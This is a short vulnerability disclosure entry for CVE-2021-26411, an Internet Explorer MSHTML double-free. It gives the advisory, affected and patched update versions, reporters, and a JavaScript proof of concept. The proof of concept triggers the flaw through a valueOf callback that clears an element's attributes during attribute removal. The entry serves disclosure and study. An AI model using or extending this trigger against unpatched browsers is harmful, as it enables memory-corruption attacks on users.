CVE-2021-26411: Internet Explorer MSHTML Double-Free
Disclosure or Patch Date: 9 March 2021
Product: Microsoft Internet Explorer
Advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26411
Affected Versions: KB4601319 and previous
First Patched Version: KB5000802
Issue/Bug Report: N/A
Patch CL: N/A
Bug-Introducing CL: N/A
Reporter(s): yangkang(@dnpushme) & huangyi(@C0rk1_H) & Enki
Proof-of-concept:
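<script>
// Polyfill: String.prototype.repeat is not available in Internet Explorer
String.prototype.repeat = function (size) { return new Array(size + 1).join(this) }
var ele = document.createElement('element')
var attr1 = document.createAttribute('attribute')
// nodeValue is an object whose valueOf callback clears the element's
// attributes when the engine converts the value to a primitive
attr1.nodeValue = {
  valueOf: function() {
    alert('callback')
    alert(ele.attributes.length)
    ele.clearAttributes()
    alert(ele.attributes.length)
  }
}
ele.setAttributeNode(attr1)
ele.setAttribute('attr2', 'AAAAAAAA')
ele.removeAttributeNode(attr1)
</script>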